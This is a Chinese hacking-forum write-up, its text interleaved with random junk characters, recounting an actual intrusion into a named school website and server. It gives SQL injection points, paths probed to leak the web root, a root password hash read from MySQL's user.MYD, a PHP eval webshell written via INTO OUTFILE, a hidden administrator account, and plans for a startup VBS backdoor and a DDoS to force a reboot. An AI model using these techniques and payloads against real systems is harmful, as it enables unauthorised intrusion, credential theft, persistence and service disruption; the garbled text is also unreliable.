第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏3 Y2 ?- y6 m9 W
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
+ o; i2 ]! }& ]$ h2 M9 Z+ H4 d% R3 S m
) x4 F- j& v" W: _2 j3 H% r( V( u. C
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 - R: ^( C9 ?' L0 D! [
) Q5 F# K- ?- _! G- t那么想可以直接写入shell ,getshell有几个条件:" ^) {$ `' c2 W2 T, q
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF $ b+ T8 Z3 d: ]) Z- V
4 e" z0 Q" Q. T$ _5 u1 I4 {
试着爆绝对路径: 0 b5 g, O2 g! h7 }9 ? w% l8 O
1./phpMyAdmin/index.php?lang[]=1 * z, C- j8 h3 ?* N3 K; k
2./phpMyAdmin/phpinfo.php ) p7 K( a: W+ d, I. |
3./load_file()
% e* Q- b' d6 t/ R4./phpmyadmin/themes/darkblue_orange/layout.inc.php " h0 C/ E- R* S& M9 M
5./phpmyadmin/libraries/select_lang.lib.php
9 A9 x) G2 C' c3 d6./phpmyadmin/libraries/lect_lang.lib.php
7 r, c- O" A; T9 X& m' k/ a7./phpmyadmin/libraries/mcrypt.lib.php
; g" g; u- U3 h7 D8./phpmyadmin/libraries/export/xls.php
. Y9 E. B* U5 p3 A, Y
) a6 H E( m7 V: Q' c. ]2 c) |均不行........................... 0 g/ b/ k3 f% V+ a! ~
" m0 F3 d1 R3 ?, M5 @& ~: M
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php 2 T, d$ z. I% b# c1 c
6 D' o+ g9 A& O* c" h权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
& ^$ K4 T" |7 j) v2 E+ V/ |: [/ w X
) t2 x t% q1 m- r& S默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
, N" G5 k! A3 |& i- o" L$ ?$ T. d1 U4 z. r$ ^+ O9 e
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... 9 j; ~, q4 q1 x% f
% X4 |) j3 _- |: D0 X想想root还可以读,读到root密码进phpmyadmin 也可以拿shell ; s$ |+ [5 z7 O
/ F* f5 ~! [5 ?7 N
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 9 B# K3 M- {% c
9 a6 A2 x+ t2 g" W P o. z自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
5 @' U) P1 B3 A' I& J( K$ p+ z$ f3 L" u8 ~3 d n! L. M3 V# v
成功读到root密码: 9 u- P) s o* S. r q! |
5 K U2 a$ E* h+ |17---- r(0072) , g4 c; s) R- C0 v3 p9 s* a
18---- o(006f) 6 \; N3 D. Q/ Z3 p
19---- o(006f)
r0 u: p: X! j0 N20---- t(0074) 3 S4 v7 J9 B$ r3 x6 E3 T& W
21---- *(002a)
7 D3 W8 d, l7 n/ [) F% E5 [/ T3 ]22---- 8(0038) * C4 o$ O! r( v( W. R! \1 u% c! A
23---- 2(0032)
0 `; P+ v4 c- |24---- E(0045) . \" T* ~$ R3 L3 H3 d
25---- 1(0031)
U- j+ U8 _& r6 B26---- C(0043)
6 |- w) u. h4 L8 R8 f5 w7 t4 M( A% d27---- 5(0035) ; [; k8 S3 ^( k2 r5 u) u
28---- 8(0038) 6 v) k% x9 n, o Y/ O- ]/ V
29---- 2(0032)
+ Q5 A' z; W, s30---- 8(0038)
2 a% g2 K0 F8 C" b$ K; n31---- A(0041)
7 T& _' B7 N* {32---- 9(0039)
$ L- U! {# N1 [$ H33---- B(0042)
1 K, j; N+ |% C" M5 ~34---- 5(0035) " r- K# x* U% i7 \( {/ z, O. i
35---- 4(0034) : z( Q' i6 T2 g: n1 X4 L
36---- 8(0038) ( I( o7 C; ?' m) I
37---- 6(0036)
% ~ n8 N$ ?2 c: Q$ K, w38---- 4(0034)
! a) d* Q, t( ^; v" l39---- 9(0039) ; E e, N5 w! P% T# b
40---- 1(0031)
/ S5 s3 z. a8 _41---- 1(0031) 9 W5 d+ g( x* D
42---- 5(0035) 9 n: K! h) |5 g& ?- ], c# J
43---- 3(0033) 6 U" S3 h% v+ n, G- Q
44---- 5(0035)
% \$ V5 a4 A9 A: q45---- 9(0039)
: Y& N# I) k- {46---- 8(0038)
+ O# R6 `( e* R; d7 A5 d( M3 w1 V; g47---- F(0046)
0 {# Y8 I/ A1 \0 t48---- F(0046)
8 B# |+ @: G/ D" }' |9 r7 m* L49---- 4(0034) * g" a" ~/ V) |1 d Z
50---- F(0046) # f0 a6 A. x; E7 P& P
51---- 0(0030)
# ]4 `( u+ r* N2 X( c+ D52---- 3(0033)
: u+ m5 K1 v# b O1 I4 K53---- 2(0032) + ^- A" E7 N0 g# e8 {
54---- A(0041) * u: r$ Q& c5 l
55---- 4(0034) ' l$ s+ \ m, R& k+ w
56---- A(0041) ( x/ @. r- V$ J$ V
57---- B(0042) ( G0 Q" y+ i4 M( r3 P2 E5 r
58---- *(0044)
- T2 Q$ q6 d% j59---- *(0035)
3 V" D6 G' i! I5 M+ j. T$ }60---- *(0041) ) \' R6 ^6 y3 y
61---- *0032) p2 e5 M- E% e' E* D
$ _1 a$ b4 q" y& q. V' I
解密后成功登陆phpmyamin 2 r$ n8 F9 m R) I' o
8 [" o0 @- }" Q0 \, {: ~' y; G# K' D5 \
; X' a! d/ u; f) h& ~
3 O& ~1 q& w4 T/ h& a- f4 F+ `找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' 8 f# F5 v+ z2 o9 Q2 a# l
, ?) M" g1 j( V4 m; \: E ]成功执行,拿下shell,菜刀连接: , v: q3 l9 H* a
# _* B& q% a6 h [- ~; p
服务器不支持asp,aspx,php提权无果...................
8 ]! n4 x2 i. c* f k2 | M/ N$ g3 L$ S( t
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: $ p5 q5 O Q$ s' g U8 U
服务器上已经有个隐藏帐号了 * t" c3 d1 n8 }
别名 administrators" @% _3 I1 \2 [. k- [$ D3 U
注释 管理员对计算机/域有不受限制的完全访问权 * q* o4 ^/ b- _. z
成员
+ m' Y/ P& @' `; ]/ @: E-------------------------------------------------------------------------------: I3 \% h. y1 R+ E7 o$ Z
admin* y2 }0 x: G: } A
Administrator
2 q- y& q: q ^# {) m# P4 E% e7 e6 `: Jslipper$
' U+ ?1 @9 ]$ j7 F$ E4 M' B% f- D, fsqluser% Q" |5 f' I F- F
命令成功完成。
D% ^5 F1 R" j9 ^1 R" d" m N, J9 P2 t1 P
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
) [0 I: a- H! g. O0 P( Z% o/ w! u6 g# s0 l E
ddos服务器重启,不然就只能坐等服务器重启了...............................
# b3 }9 m' k5 V) }/ B) ]
- B* Z& R5 }2 T. P0 h) ^4 H+ S( h ! e3 T/ ~2 k9 W% P) Y% P6 m# c
|